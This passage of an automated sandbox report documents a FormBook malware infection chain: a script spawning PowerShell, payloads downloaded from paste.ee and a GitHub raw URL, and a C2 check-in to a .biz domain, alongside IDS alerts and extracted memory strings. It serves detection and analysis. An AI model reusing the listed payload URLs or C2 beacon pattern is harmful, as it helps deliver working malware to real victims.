Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNqSPruzCXM.exe, 00000011.00000000.2643006321.000000000026E000.00000002.00000001.01000000.00000006.sdmp, mNqSPruzCXM.exe, 00000018.00000000.2801120472.000000000026E000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: appidtel.pdbGCTL source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\convert.exe	Code function: 4x nop then mov ebx, 00000004h	19_2_035604DE
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 4x nop then pop edi	24_2_04A194DF
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 4x nop then xor eax, eax	24_2_04A1D075
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 4x nop then pop edi	24_2_04A17BCC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50000 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49842 -> 188.114.96.3:443

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/SKF1O/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 199.59.243.227 199.59.243.227

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/SKF1O/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6450/?EzrD=UbYh&mzEt0=52WN8KqJ7jnOEIaeyCxqWgP+KtwCoaIDn8AokGilDz2wl3Qo7VTMWMYazPgXvK5QOqLqt5Ti3xVPGgdXo5E4TqsbUcYSzSRqT9OtwmziQ+LYHZobMnJC5bEpbrqa7K8o2xX/TOE= HTTP/1.1Host: www.donante-de-ovulos.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-si; HTC_Desire_601 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: www.donante-de-ovulos.biz

Source: powershell.exe, 00000008.00000002.2479829877.000001B5FF4CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: svchost.exe, 0000001B.00000002.3540546756.0000021B42E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.27.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.27.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2445760088.000001B5F72E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8906000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000005.00000002.2347449551.000001F606841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DE91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E7271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.2347449551.000001F60688E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000005.00000002.2347449551.000001F6068A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2508706310.000001875DECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E7271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: convert.exe, 00000013.00000003.2915997217.0000000007ED8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E776D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: edb.log.27.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000001B.00000003.2994764845.0000021B43050000.00000004.00000800.00020000.00000000.sdmp, edb.log.27.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8B37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.2350094223.000001F61E99F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: convert.exe, 00000013.00000003.2911076657.0000000007EB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_d
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: convert.exe, 00000013.00000002.2974673632.0000000002F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: convert.exe, 00000013.00000002.2974673632.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000008.00000002.2445760088.000001B5F72E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8BBF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E894F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/SKF1O/0
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E8901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000008.00000002.2410867830.000001B5E7492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2410867830.000001B5E8611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
